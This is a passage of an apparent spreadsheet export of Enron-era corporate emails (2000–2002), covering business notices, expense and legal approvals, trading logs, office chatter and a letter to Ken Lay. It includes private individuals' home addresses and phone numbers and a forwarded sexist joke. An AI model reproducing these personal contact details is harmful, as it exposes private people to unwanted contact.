RE:_x000D_
International Energy Week Reception Tickets_x000D_
_x000D_
_x000D_
The New York Mercantile Exchange will host the International Energy Reception _x000D_
on Tuesday May 8 from 6:00 PM to 8:00 PM on the NYMEX division trading _x000D_
floor.  All NYMEX members are entitled to 2 complimentary tickets and all _x000D_
NYMEX member firms are entitled to 10 complimentary tickets.  Non-member _x000D_
energy industry companies are entitled to 2 complimentary tickets.  _x000D_
Additional tickets are available for $50 each._x000D_
_x000D_
Tickets are available from Josephine Muli (299-2329 or jmuli@nymex.com) in _x000D_
the Marketing Department on the 15th floor of the Exchange building._x000D_
_x000D_
_x000D_
_x000D_
___________________________________________________x000D_
Please click on the link below to indicate you have received this_x000D_
email._x000D_
_x000D_
"http://208.206.41.61/email/email_log.cfm?useremail=tana.jones@enron.com&amp;refdo_x000D_
c=(01-151)"_x000D_
_x000D_
Note: If you click on the above line and nothing happens, please copy_x000D_
the text between the quotes, open your internet browser,_x000D_
paste it into the web site address and press Return._x000D_
</t>
  </si>
  <si>
    <t>Thu, 6 Jul 2000 11:09:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Expense Report for Stephen Schwarz Dated 7/6/00</t>
  </si>
  <si>
    <t xml:space="preserve">This looks good.  Please send this wherever it should go.  Thanks. _x000D_
---------------------- Forwarded by Sally Beck/HOU/ECT on 07/06/2000 06:07 PM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
Stephen P Schwarz_x000D_
07/06/2000 02:41 PM_x000D_
To: Sally Beck/HOU/ECT@ECT, Patti Thompson/HOU/ECT@ECT, Kimberly _x000D_
Perkins/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Expense Report for Stephen Schwarz Dated 7/6/00_x000D_
_x000D_
For your approval._x000D_
_x000D_
Stephen_x000D_
---------------------- Forwarded by Stephen P Schwarz/HOU/ECT on 07/06/2000 _x000D_
02:39 PM ---------------------------_x000D_
_x000D_
_x000D_
Kimberly Perkins_x000D_
07/06/2000 10:39 AM_x000D_
To: Stephen P Schwarz/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Expense Report for Stephen Schwarz Dated 7/6/00_x000D_
_x000D_
Stephen,_x000D_
_x000D_
Attached is your expense report.  Please let me know if any revisions are _x000D_
required.  If no revisions are necessary, please forward to Sally for her _x000D_
approval.  Thank you._x000D_
_x000D_
Kim_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Sun, 3 Sep 2000 02:17:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Ice Drilling - G/L calculation</t>
  </si>
  <si>
    <t xml:space="preserve">Set up a meeting with the accounting people w/knowledge of these figures asap_x000D_
_x000D_
_x000D_
_x000D_
	Linda R Guinn_x000D_
	08/22/2000 03:30 PM_x000D_
		 _x000D_
		 To: Richard B Sanders/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: Ice Drilling - G/L calculation_x000D_
_x000D_
Below is the figure from accounting.  Let's discuss._x000D_
_x000D_
Linda Guinn_x000D_
Enron North America_x000D_
1400 Smith Street_x000D_
Houston, Texas  77002_x000D_
(713) 853-6104_x000D_
(713) 646-3393 (fax)_x000D_
_x000D_
----- Forwarded by Linda R Guinn/HOU/ECT on 08/22/2000 03:28 PM -----_x000D_
_x000D_
	Lisa King_x000D_
	08/22/2000 12:58 PM_x000D_
		 _x000D_
		 To: Linda R Guinn/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: Ice Drilling - G/L calculation_x000D_
_x000D_
Linda-_x000D_
_x000D_
Attached is a schedule detailing the gain/loss calculation for Ice Drilling.  _x000D_
Apparently PriceWaterhouseCoopers acted as a receiver and sold Ice Drilling _x000D_
in August 99.  We received total cash proceeds of $9,583,845.74 between _x000D_
August and September, but the value of the asset on the books was _x000D_
$9,979,591.85 (loss of $395,746.11).  We also wrote off a receivable of _x000D_
$474,557.83.  In summary, we lost a total of $870,303.94 ($395,746.11 + _x000D_
$474,557.83).  I am assuming that we are trying to recover the total amount _x000D_
lost of $870,303.94.  Let me know if you need further information._x000D_
_x000D_
-Lisa_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 13 Dec 2001 08:42:44 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'julio@marinadelreytx.com'})</t>
  </si>
  <si>
    <t>Brad McKay's info.</t>
  </si>
  <si>
    <t>Good talking to you and Mom the other day.  Attached is the info I have for_x000D_
McKay:_x000D_
_x000D_
McKay, Brad &amp; Tiffany_x000D_
2406 Briarbrook_x000D_
Houston TX 77042_x000D_
Home: (713) 972-1208_x000D_
Work: 713-853-7699_x000D_
Cell: 713-304-1557  or 281-381-9267_x000D_
_x000D_
Graydon Laguarta_x000D_
McShane Corporation_x000D_
2700 Via Fortuna, Suite 301_x000D_
Austin, Texas   78746_x000D_
Phone: 512-328-7111_x000D_
Fax:  512-328-7112_x000D_
Email:  glaguarta@mcshane.com_x000D_
Web Site:  McShane.com</t>
  </si>
  <si>
    <t>Fri, 20 Apr 2001 09:43:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Start Date: 4/20/01; HourAhead hour: 17;  &lt;CODESITE&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Start Date: 4/20/01; HourAhead hour: 17;  No ancillary schedules awarded.  _x000D_
Variances detected._x000D_
Variances detected in Generation schedule._x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final _x000D_
Schedules\2001042017.txt_x000D_
_x000D_
---- Generation Schedule ----_x000D_
$$$ Variance found in table tblGEN_SCHEDULE._x000D_
     Details: (Hour: 17 / Preferred:  80.00 / Final:  79.97)_x000D_
  TRANS_TYPE: FINAL_x000D_
  SC_ID: ECTRT_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 4/20/01_x000D_
  UNIT_ID: HARBGN_7_UNITS_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 9 Jun 2000 07:12:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Idacorp Enron Guaranty</t>
  </si>
  <si>
    <t xml:space="preserve">Cement:_x000D_
Enclosed is the Enron Guaranty that we need executed in connection with an _x000D_
ISDA Master Agreement that we have finalized with Idacorp Energy Solutions _x000D_
LP.  We would like to have the Master become effective next week so would it _x000D_
be possible to have this signed next week?  If you have any questions, please _x000D_
call me or Susan Flynn._x000D_
Carol_x000D_
</t>
  </si>
  <si>
    <t>Fri, 5 Jan 2001 00:30:00 -0800 (PST)</t>
  </si>
  <si>
    <t>ENA/Sweetgum Amendment Letters</t>
  </si>
  <si>
    <t xml:space="preserve">Sounds good to me._x000D_
_x000D_
We really need to get this amendment signed today.  Please do what you can to _x000D_
expedite._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Kay_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Kay Mann/Corp/Enron on 01/05/2001 08:28 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
"George Kutzschbach" &lt;gkutzschbach@fulbright.com&gt; on 01/04/2001 07:23:30 PM_x000D_
To: CCampbell@KSLAW.com_x000D_
cc: Kay.Mann@enron.com, DPedigo@INTERGEN.com _x000D_
_x000D_
Subject: ENA/Sweetgum Amendment Letters_x000D_
_x000D_
Carolyn,_x000D_
_x000D_
It has been brought to may attention that Section 3.2 of both of the_x000D_
LLC Agreement forms that were initialed on December 27 incorrectly_x000D_
states that SEL is a Delaware limited liability company rather than a_x000D_
Delaware limited partnership.  Since the amendment letters purport to be_x000D_
all inclusive, they should be further amended by inserting the following_x000D_
sentence in an appropriate place in the two amendment letters for the_x000D_
turbine generator sets:_x000D_
_x000D_
"The Parties further agree that Section 3.2 of the LLC Agreement to_x000D_
which reference is made in the Original Agreement will be amended as_x000D_
appropriate to reflect that SEL is a Delaware limited partnership and_x000D_
not a Delaware limited liability company."_x000D_
_x000D_
George_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 7 Jun 2001 08:04:33 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: interview - Justin O'Malley</t>
  </si>
  <si>
    <t>I think we are going to pass._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Buckley, Karen  _x000D_
Sent:	Tuesday, June 05, 2001 3:11 PM_x000D_
To:	Lavorato, John_x000D_
Cc:	Hillis, Kimberly_x000D_
Subject:	interview - Justin O'Malley_x000D_
_x000D_
John,_x000D_
_x000D_
would you like to move forward and offer a role int he trading track to the above?_x000D_
_x000D_
Karen.</t>
  </si>
  <si>
    <t>Wed, 17 Jan 2001 08:54:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Birthday</t>
  </si>
  <si>
    <t>Are you sure about that email address???  I sent one and it bounced...or was _x000D_
that just another test?</t>
  </si>
  <si>
    <t>Mon, 14 May 2001 03:36:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'kathy.mcmahon@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'michael.kopper@enron.com', 'jeff.skilling@enron.com', 'vasant.shanbhogue@enron.com', 'paula.rieker@enron.com', 'cliff.baxter@enron.com', 'janet.dietrich@enron.com', 'james.derrick@enron.com', 'gene.humphrey@enron.com', 'gregory.adams@enron.com', 'robert.jones@enron.com', 'kevin.hannon@enron.com', 'gina.taylor@enron.com', 'jeff.donahue@enron.com', 'david.delainey@enron.com', 'eric.thode@enron.com', 'mark.frevert@enron.com', 'richard.causey@enron.com', 'peggy.mahoney@enron.com', 'dennis.vegas@enron.com', 'cynthia.barrow@enron.com', 'steven.kean@enron.com', 'michael.terraso@enron.com', 'sarah.davis@enron.com', 'louise.kitchen@enron.com', 'jean.mrha@enron.com', 'jeffrey.shankman@enron.com', 'shelley.corman@enron.com', 'elyse.kalmans@enron.com', 'jordan.mintz@enron.com', 'stan.horton@enron.com', 'laura.schwartz@enron.com', 'danny.mccarty@enron.com', 'mary.joyce@enron.com', 'ken.rice@enron.com', 'terrie.james@enron.com', 'sean.long@enron.com', 'andrew.fastow@enron.com', 'mark.palmer@enron.com', 'lou.pai@enron.com', 'greg.whalley@enron.com', 'mitchell.taylor@enron.com', 'kenneth.lay@enron.com'})</t>
  </si>
  <si>
    <t>Invitation</t>
  </si>
  <si>
    <t>Cindy asked me to forward the attached memo._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Thanks, _x000D_
Kathy</t>
  </si>
  <si>
    <t>Mon, 8 Jul 2002 01:34:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'mark.walker@enron.com', 'john.ruiz@enron.com', 'matthew.meyers@enron.com', 'mark.fisher@enron.com'})</t>
  </si>
  <si>
    <t>Visupro</t>
  </si>
  <si>
    <t>I will be getting a Visupro CD from Joe Chapman today.  We can install it _x000D_
ourselves since it is an internal product and GEWE has the license._x000D_
_x000D_
JD</t>
  </si>
  <si>
    <t>Fri, 11 May 2001 04:25:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'glenn@pira.com'})</t>
  </si>
  <si>
    <t>Stocks in the 3 Major OECD Regions</t>
  </si>
  <si>
    <t>PIRA has published its latest estimates for stocks in the 3 Major OECD_x000D_
Regions with data thru April 2001. Please go to http://www.pira.com and log_x000D_
in to PIRA Online. If you do not have a user id and password please contact_x000D_
John Graziano jgraziano@pira.com to get connected._x000D_
_x000D_
Best Regards_x000D_
The PIRA Energy Group</t>
  </si>
  <si>
    <t>Tue, 27 Mar 2001 07:36:00 -0800 (PST)</t>
  </si>
  <si>
    <t>S&amp;P MOU Draft</t>
  </si>
  <si>
    <t xml:space="preserve">Here is the latest version of the TCPL Mainline MOU.  Significant changes _x000D_
(i.e. watered down) changes to turnback policy.  More meetings next week as _x000D_
indicated below.  I will try to attend discussions on IT Floor and Turnback._x000D_
---------------------- Forwarded by Kevin Heal/CAL/ECT on 03/27/2001 03:28 PM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
"Marg Seeger" &lt;marg_seeger@transcanada.com&gt; on 03/26/2001 03:44:19 PM_x000D_
To: John Guerriero &lt;jguerriero@duke-energy.com&gt;, Debbie Harris _x000D_
&lt;debbie_harris@transcanada.com&gt;, Phi Dang &lt;PDang@gazoductqm.com&gt;, Adam White _x000D_
&lt;adam_white@transalta.com&gt;, Bill Wible &lt;bill_wible@iroquois.com&gt;, Bob Fraser _x000D_
&lt;bobfraser@aec.ca&gt;, Brian Howell &lt;behowell@interlog.com&gt;, Brian Ridley _x000D_
&lt;bridley@hydro.mb.ca&gt;, Brian Troicuk &lt;troicuk@capp.ca&gt;, Brian White _x000D_
&lt;bswhite@ceg.com&gt;, Brian Woods &lt;brian_woods@email.mobil.com&gt;, Cheryl Worthy _x000D_
&lt;worthycg@bp.com&gt;, Chuck Baumgart &lt;cbaumgart@renaissance.ca&gt;, Debbie White _x000D_
&lt;debbwhit@marathoncanada.com&gt;, Diane Cameron &lt;diane_cameron@nexeninc.com&gt;, _x000D_
Doug Holgate &lt;doug.holgate@husky-oil.com&gt;, Frank Brennan _x000D_
&lt;frank.brennan@cgc.enbridge.com&gt;, Gilles Favreau _x000D_
&lt;favreau.gilles@hydro.qc.ca&gt;, Ken Hadley &lt;ken_hadley@pcp.ca&gt;, Kevin Heal _x000D_
&lt;kevin.heal@enron.com&gt;, Kurt McKnight &lt;kmcknight@uniongas.com&gt;, Lisa McMahon _x000D_
&lt;lisa.mcmahon@neg.pge.com&gt;, Lyne Mercier &lt;lmercier@gazmet.com&gt;, Martin _x000D_
Imbleau &lt;mimbleau@gazmet.com&gt;, mike verwegen &lt;mverwegen@uniongas.com&gt;, Mike _x000D_
Stedman &lt;mstedman@uniongas.com&gt;, Murray Samuel _x000D_
&lt;murray_samuel@transcanada.com&gt;, Robert Agnello &lt;ragnello@edisonmission.com&gt;, _x000D_
Robert Andrews &lt;randrews@coral-energy.com&gt;, Peter Fournier _x000D_
&lt;pfournier@igua.ca&gt;, Ron Moore &lt;ronald.moore@esso.com&gt;, Ronald Richard _x000D_
&lt;ronald.richard@mrn.gouv.qc.ca&gt;, Shonda Day &lt;days@epenergy.com&gt;, Suzanne _x000D_
Boucher-Chen &lt;suzanne.boucher-chen@mirant.com&gt;, Vern Gorr _x000D_
&lt;vgorr@saskenergy.sk.ca&gt;, Frederic Morel &lt;fmorel@gazmet.com&gt;, Isabelle Quach _x000D_
&lt;iquach@gazmet.com&gt;, Robert Rowe &lt;rob.rowe@cgc.enbridge.com&gt;, Richard King _x000D_
&lt;rking@powerbudd.com&gt;, Dan Collins &lt;dacollins@negm.com&gt;, Mike Lucy _x000D_
&lt;mslucy@negm.com&gt;, Nick Schultz &lt;schultz@capp.ca&gt;, Howard Stephens _x000D_
&lt;hstephens@hydro.mb.ca&gt;, Brent Moen &lt;bmoen@hydro.mb.ca&gt;, Jeremy Slasor _x000D_
&lt;jeremy.slasor@demloak.com&gt;, Jim Fisher &lt;jfisher@duke-energy.com&gt;, Janet _x000D_
Holder &lt;janet.holder@cgc.enbridge.com&gt;, Rob Hemstock &lt;rhemsto@ect.enron.com&gt;, _x000D_
Aleck Dadson &lt;adadson@ect.enron.com&gt;, Normand Stevenson _x000D_
&lt;nstevenson@gazmet.com&gt;, Randy Fryer &lt;rfryer@northlandpower.com&gt;, Alan Reid _x000D_
&lt;alan_reid@pcp.ca&gt;, John MacPherson &lt;macpher@petro-canada.ca&gt;, Alain Lefebvre _x000D_
&lt;alain.lefebvre@mrn.gouv.qc.ca&gt;, craigl &lt;craigl@cnrl.com&gt;, swong _x000D_
&lt;swong@northlandpower.com&gt;, rinde_powell &lt;rinde_powell@pcp.ca&gt;, "ed.bruton" _x000D_
&lt;ed.bruton@neg.pge.com&gt;, Marg Seeger &lt;marg_seeger@transcanada.com&gt;, lnixon _x000D_
&lt;lnixon@tmvgas.com&gt;, "jill.page" &lt;jill.page@gov.ab.ca&gt;, Max Feldman _x000D_
&lt;max_feldman@transcanada.com&gt;, "bernard.kramer" _x000D_
&lt;bernard.kramer@mcnenergy.com&gt;, bartlon &lt;bartlon@epenergy.com&gt;, sharon _x000D_
johnson &lt;sharonej@telusplanet.net&gt;, Jack Hawks &lt;jack.hawks@neg.pge.com&gt;, _x000D_
Frank Basham &lt;fbasham@talisman-energy.com&gt;, "carol.nykolyn" _x000D_
&lt;carol.nykolyn@gov.ab.ca&gt;, Tomasz Lange &lt;Tomasz.Lange@mirant.com&gt;, Paul _x000D_
Manders &lt;Paul.Manders@est.gov.on.ca&gt;, Nola Ruzycki _x000D_
&lt;nola_ruzycki@transcanada.com&gt;, Sherry_Grimby &lt;Sherry_Grimby@anadarko.com&gt;_x000D_
cc:  _x000D_
Subject: S&amp;P MOU Draft_x000D_
_x000D_
_x000D_
In preparation for S&amp;P meetings on April 3 - 5, 2001, attached is the_x000D_
most recent draft of the Service and Pricing MOU.  The purpose of these_x000D_
meetings is to review the document and consider final changes and any_x000D_
legal changes to the MOU._x000D_
_x000D_
Please note that the meetings will take place in Calgary, at the_x000D_
Metropolitan Centre, 333 - 4th Avenue SW in the Strand/Tivoli rooms._x000D_
_x000D_
Tuesday, April 3, 2001  9am - 5pm_x000D_
Wednesday, April 4, 9am - 5pm_x000D_
Thursday, April 5, 9am - 5pm_x000D_
_x000D_
An agenda will be sent out later this week._x000D_
_x000D_
 - MAINLINE SETTLEMENT Draft 7M.doc_x000D_
 - marg_seeger.vcf_x000D_
</t>
  </si>
  <si>
    <t>Mon, 12 Nov 2001 06:42:47 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'frank.ermis@enron.com', 'p..south@enron.com', 'mog.heu@enron.com', 'tori.kuykendall@enron.com', 'jason.wolfe@enron.com', 'm..scott@enron.com', 'l..gay@enron.com', 'matt.smith@enron.com', 'm..tholt@enron.com', 'keith.holst@enron.com', 'jay.reitmeyer@enron.com', 'matthew.lenhart@enron.com', 'jason.huang@enron.com'})</t>
  </si>
  <si>
    <t>Re: Boss Day Present</t>
  </si>
  <si>
    <t>I keep forgetting to ask you, but I need to collect $12 from each of you for Mike's boss's day present.  _x000D_
_x000D_
Thanks!_x000D_
Ina</t>
  </si>
  <si>
    <t>Wed, 18 Apr 2001 04:15:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'chris.roy@airliquide.com'})</t>
  </si>
  <si>
    <t>Easter</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Juan Hernandez/Corp/Enron on 04/18/2001 _x000D_
11:15 AM ---------------------------_x000D_
_x000D_
_x000D_
Don Baughman@ECT_x000D_
04/17/2001 05:38 PM_x000D_
To: Kayne Coulter/HOU/ECT@ECT, John Kinser/HOU/ECT@ECT, Patrick _x000D_
Hanse/HOU/ECT@ECT, Rudy Acevedo/HOU/ECT@ECT, Larry Jester/Corp/Enron@ENRON, _x000D_
Juan Hernandez/Corp/Enron@ENRON, Joe Errigo/Corp/Enron@Enron, Dean _x000D_
Laurent/HOU/ECT@ECT, Keller Mayeaux/Corp/Enron@Enron, Doug _x000D_
Miller/Corp/Enron@Enron, Chad Starnes/Corp/Enron@Enron, Joe _x000D_
Stepenovitch/Corp/Enron@Enron, Larry F Campbell/NA/Enron@Enron, Christopher _x000D_
Watts/NA/Enron@Enron, Juan Padron/NA/Enron@Enron, Steve _x000D_
Olinde/Corp/Enron@Enron, Mauricio Trejo/Enron@EnronXGate, Benjamin _x000D_
Rogers/HOU/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: Easter_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 - easter-is-cancelled.jpg_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 30 Jan 2002 11:39:01 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'mikefwmi@aol.com'})</t>
  </si>
  <si>
    <t>Michael Fenton_x000D_
5749 NE 62nd Street_x000D_
Seattle, WA 98115_x000D_
mikefwmi@aol.com_x000D_
_x000D_
To Mr. Ken Lay,_x000D_
_x000D_
I'm writing to urge you to donate the millions of dollars you made from selling Enron stock before the company declared bankruptcy to funds, such as Enron Employee Transition Fund and REACH, that benefit the company's employees, who lost their retirement savings, and provide relief to low-income consumers in California, who can't afford to pay their energy bills.  Enron and you made millions out of the pocketbooks of California consumers and from the efforts of your employees._x000D_
_x000D_
Indeed, while you netted well over a $100 million, many of Enron's employees were financially devastated when the company declared bankruptcy and their retirement plans were wiped out.  And Enron made an astronomical profit during the California energy crisis last year.  As a result, there are thousands of consumers who are unable to pay their basic energy bills and the largest utility in the state is bankrupt._x000D_
_x000D_
The New York Times reported that you sold $101 million worth of Enron stock while aggressively urging the company's employees to keep buying it.  Please donate this money to the funds set up to help repair the lives of those Americans hurt by Enron's underhanded dealings._x000D_
_x000D_
Sincerely,_x000D_
_x000D_
Michael Fenton</t>
  </si>
  <si>
    <t>Wed, 25 Apr 2001 03:36:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jhefti1528@aol.com', 'laura.frei@alcoa.com', 'dimedollar@hotmail.com', 'dan.j.hyvl@enron.com', 'darvin.kaderka@alcoa.com', 'brenda.rowan@alcoa.com', 'muleman1@earthlink.net', 'kenneth.schaeffer@alcoa.com', 'lvlindley@earthlink.net', 'blanghem@anthonysylvan.com', 'christina.gensler@alcoa.com'})</t>
  </si>
  <si>
    <t>FW: Henry Ford and God</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Henry Ford and God_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Henry Ford dies and goes to heaven. At the Gates, St. Peter greets Ford and_x000D_
tells him, "Well, you've been such a good guy, and your_x000D_
invention...the assembly line for the automobile...changed the world. As a_x000D_
reward, you can hang out with anyone in Heaven you want."_x000D_
_x000D_
Ford thinks about it, and says, - "I want to hang out with God Himself."_x000D_
_x000D_
So the befuddled St. Peter takes Ford to the Throne Room, and introduces him_x000D_
to God. Ford then asks God, - "When you invented Woman, what were you_x000D_
thinking?"_x000D_
_x000D_
God asks, "What do you mean?"_x000D_
"Well," says Ford, "You have some major design flaws in your invention:_x000D_
1. There's too much front end protrusion._x000D_
2. It chatters way too much at high speeds._x000D_
3. Maintenance is extremely high._x000D_
4. It constantly needs repainting and refinishing._x000D_
5. Every 28 days it leaks fluid and is rendered out of service._x000D_
6. The rear end wobbles too much._x000D_
7. The intake is placed too close to the exhaust._x000D_
8. The headlights are usually too small._x000D_
9. Fuel consumption is outrageous._x000D_
_x000D_
"Hummmm," replies God, "hold on a minute." God goes over to the_x000D_
Celestial Supercomputer, types in a few keystrokes, and waits for the_x000D_
results. In no time the computer prints out a report, and God reads it._x000D_
God then turns to Ford, and says, "It may be that my invention is_x000D_
flawed, but according to these statistics, more men are riding my_x000D_
invention than yours. </t>
  </si>
  <si>
    <t>Wed, 24 Oct 2001 11:50:04 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jennifer_lamprecht@oxy.com'})</t>
  </si>
  <si>
    <t>RE: Garage Sale Information</t>
  </si>
  <si>
    <t xml:space="preserve">ok - my opinion - i think signs are enough but am not opposed to pitching in for an ad, i will try my best to come over friday night but if i cant - what time will you be up on saturday?_x000D_
_x000D_
-----Original Message-----_x000D_
From: Jennifer_Lamprecht@oxy.com [mailto:Jennifer_Lamprecht@oxy.com]_x000D_
Sent: Wednesday, October 24, 2001 1:28 PM_x000D_
To: Susan.Hadix@elpaso.com; Tiffany_Lauer@manulife.com;_x000D_
tkuyken@enron.com_x000D_
Subject: Garage Sale Information_x000D_
_x000D_
_x000D_
Hello All!_x000D_
_x000D_
Just wanted to give you guys an update.  The weather looks good for the_x000D_
garage sale this weekend.  So that is a good thing.  _x000D_
_x000D_
If you want to bring your stuff by Friday evening, that might be a good plan_x000D_
for us all to get things set up.  That way all we have to do saturday_x000D_
morning is drag the tables out of the garage.  Also, I do not have a rack_x000D_
for hanging clothes, so they will have to be folded or hung on the fence._x000D_
_x000D_
How about coming over friday evening around 630-7pm.  Also, if you have any_x000D_
card tables, please bring them.  I have one and am borrowing two from my_x000D_
parents.  But I am sure we may need a couple of more._x000D_
_x000D_
I bought a couple of garage sale signs on Monday and plan to put them out on_x000D_
the main street, South Braeswood.  Another idea would be for us to take out_x000D_
an ad in the greensheet.  Someone told me they cost around $15.  I am in the_x000D_
process of getting some info as to the exact cost and will let you know when_x000D_
i get the info confirmed. I am leaving that up to the majority vote as to_x000D_
whether we all chip in for the add or not.  I think it may be worth it, some_x000D_
people look for those adds and spend all day saturday doing garage sales._x000D_
But whatever you guys think_x000D_
_x000D_
The hours of the Sale will be from 7am-1230ish.  I think by then whatever_x000D_
doesn't sale either goes home or to goodwill.  I know some of you cant be_x000D_
there all day or right at 7am, but I will need some help so let me know what_x000D_
time you plan on coming over that morning._x000D_
_x000D_
Ok, so to summarize all my chatter, 3 questions, 1:  do we take out an ad in_x000D_
the greensheet?   2: are you coming over friday to set up? and 3:  what time_x000D_
will you be there on sat?_x000D_
_x000D_
See ya_x000D_
_x000D_
Jennifer  _x000D_
</t>
  </si>
  <si>
    <t>Tue, 28 Nov 2000 00:36:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: AA Global PRC</t>
  </si>
  <si>
    <t xml:space="preserve">Remi,_x000D_
_x000D_
Thank you very much for your obvious interest and commitment to doing a high _x000D_
quality job in your PRC representative role.  Per your request, I am _x000D_
attaching my resume and a brief outline of my contributions during the last _x000D_
few months. _x000D_
_x000D_
I am currently in my first rotation as an Associate which I  began this past _x000D_
summer following graduation from UT with an MBA in Energy Finance.   I am _x000D_
assigned to Vince Kaminski's Research Group on the Market Fundamentals Team.  _x000D_
This team is commonly referred to as the "Weather Group" and is headed by my _x000D_
supervisor, Mike Roberts.  We are located on the gas trading floor (32nd) and _x000D_
provide direct support to all the gas desks as well as weather derivatives _x000D_
trading._x000D_
_x000D_
Thanks again for your interest and I am looking forward to meeting you.   _x000D_
Please let me know if you need any additional information._x000D_
_x000D_
_x000D_
Sincerely,_x000D_
_x000D_
Charlie Weldon_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Remi Collonges@ENRON_x000D_
11/22/2000 04:30 PM_x000D_
To: Kelli Little/NA/Enron@Enron, Justin Cornett/Enron Communications@Enron _x000D_
Communications, Jeff M Gray/NA/Enron@ENRON, Kyu-Bong Lee/NA/Enron@Enron, _x000D_
Massimo Marolo/NA/Enron@Enron, Isaque Nagata/SA/Enron@Enron, Olalekan _x000D_
Oladeji/NA/Enron@Enron, Pauline Reyes/Enron Communications@Enron _x000D_
Communications, Reagan Rorschach/NA/Enron@Enron, Ricardo _x000D_
Sassatani/SA/Enron@Enron, Joseph Wagner/NA/Enron@Enron, V Charles _x000D_
Weldon/HOU/ECT@ECT, Richard Yeboah/NA/Enron@Enron, Jennifer _x000D_
Thome/NA/Enron@Enron, Jorge Gumucio/SA/Enron@Enron_x000D_
cc: Samira Ravagnani/SA/Enron@Enron _x000D_
Subject: AA Global PRC_x000D_
_x000D_
Dear all,_x000D_
_x000D_
I believe that I will be your global PRC Representative on the 12th/13th of _x000D_
December.  For those who don't know me, I'm currently VP Trading &amp; Risk _x000D_
Management in our S?o Paulo office, dealing with power and gas.  I'm very _x000D_
glad to be one of the reps in PRC, despite the work involved, because I truly _x000D_
believe that the best assets of our company are its employees.  I want to do _x000D_
my best to represent you fairly and actively._x000D_
_x000D_
In order to facilitate my task, I would really appreciate that all of you _x000D_
forward to me, by email:_x000D_
_x000D_
1. a list of your accomplishments in year 2000 (should be not more than 10 to _x000D_
12 bullet points, telegraphic style)_x000D_
2. a decently recent resume, that shows your school, previous work experience _x000D_
and start date at Enron._x000D_
3. a list of all of your rotations at Enron since hired._x000D_
_x000D_
4. In addition, I commit to call your supervisor as listed in PEP system to _x000D_
discuss your performance_x000D_
_x000D_
5. I would also like to meet all of you before PRC meetings: I believe that _x000D_
you are either based in South America or in Houston (if that was not the _x000D_
case, please let me know by email, we'll speak on the phone).  For those _x000D_
based in S?o Paulo, call me and visit at our mutual convenience during the _x000D_
week of 4 to 8 December.  For those based in Houston, please call Samira (her _x000D_
phone is (55) 11 5503 1200) and schedule a half-hour meeting with me on _x000D_
Monday December 11, if you are in town.  I will be in Houston and should stay _x000D_
in 3AC1439 (or not far from there).  If you are based in Houston but out of _x000D_
town the 11th, let me know in advance, I'll speak to you on the phone._x000D_
_x000D_
I hope we'll run this process smoothly.  I look forward to meeting all of you,_x000D_
_x000D_
Remi_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 23 Apr 2001 09:49:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Confimation Template</t>
  </si>
  <si>
    <t xml:space="preserve">Sara:_x000D_
_x000D_
I am looking at a transaction with MErchant Energy Group.  We have an ISDA _x000D_
with them.  It is a financial tolling deal where we will be a fixed price _x000D_
payor for power and gas and we will pay them an option premium.  They _x000D_
forwarded the attached pro forma to illustrate how the deal would be _x000D_
papered.  Can you please review the attached and let me know if it looks OK _x000D_
or what changes are required?  They indicated an interest to transact late _x000D_
this week or early next._x000D_
_x000D_
C_x000D_
---------------------- Forwarded by Chris H Foster/HOU/ECT on 04/23/2001 _x000D_
04:31 PM ---------------------------_x000D_
   _x000D_
	Enron Capital &amp; Trade Resources Corp._x000D_
	_x000D_
	From:  "Brock, Travis" &lt;BrockT@merchantenergy.com&gt;                           _x000D_
04/23/2001 02:30 PM_x000D_
	_x000D_
_x000D_
To: "Chris Foster (E-mail)" &lt;chris.h.foster@enron.com&gt;_x000D_
cc:  _x000D_
Subject: Confimation Template_x000D_
_x000D_
_x000D_
Attached is a sample confirmation template for 100 MW's Sep01-Nov01.  We can_x000D_
use this as a starting point._x000D_
_x000D_
